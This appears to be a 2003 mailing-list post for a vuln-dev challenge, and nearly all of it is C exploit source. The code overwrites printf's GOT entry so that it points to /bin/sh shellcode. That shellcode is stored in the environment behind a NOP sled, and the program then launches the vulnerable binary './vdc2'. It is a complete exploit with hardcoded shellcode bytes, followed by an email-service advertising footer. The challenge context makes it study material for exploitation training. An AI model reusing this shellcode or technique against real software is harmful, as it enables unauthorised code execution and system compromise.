example exploit for vuln-dev challenge 2, requires the address of the shellcode in the environment as an argument /* * example exploit code for vuln-dev challenge 2 * * we overwrite printf's got table entry to point to our * shellcode in the environment * * omicron tau - otat_private */ /* * objdump, grep, and awk need to be in your path * * tested on linux 2.4.20 using env address 0xbfffe2ac * * rm db.log first */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define VULNPATH "./vdc2" /* path to vulnerable binary */ /* /bin/sh */ char shellcode[]= "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d" "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b" "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62" "\x63\x64\x65"; unsigned int go; /* GOT entry address for printf */ void find_got_addr() { FILE *p; char buf[1024]; snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' | " \ "awk '{ print \"0x\"$1 }'", VULNPATH); p = popen(buf, "r"); fgets(buf, sizeof(buf), p); pclose(p); go = strtoul(buf, NULL, 0); go -= 2; /* ;; */ printf("[!] using got addr 0x%x\n", go); } int main(int argc, char *argv[]) { char envbuf[8192]; char obuf[129]; char scbuf[5]; unsigned int scaddr; int i; if (argc < 2) { fputs("vdc2x: usage: vdc2x scaddr\n", stderr); exit(1); } scaddr = strtoul(argv[1], NULL, 0); find_got_addr(); memset(obuf, 0, sizeof(obuf)); for (i = 0; i < sizeof(obuf) - 1; i+=4) memcpy(&obuf[i], &go, 4); obuf[sizeof(obuf) - 1] = 0; memset(envbuf, 0x90, sizeof(envbuf)); memcpy(&envbuf[8000], shellcode, strlen(shellcode)); envbuf[sizeof(envbuf) - 1] = 0; setenv("SC", envbuf, 1); memcpy(scbuf, &scaddr, 4); scbuf[4] = 0; execl(VULNPATH, "./vdc2", obuf, scbuf, NULL); return(0); } Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:10:51 PDT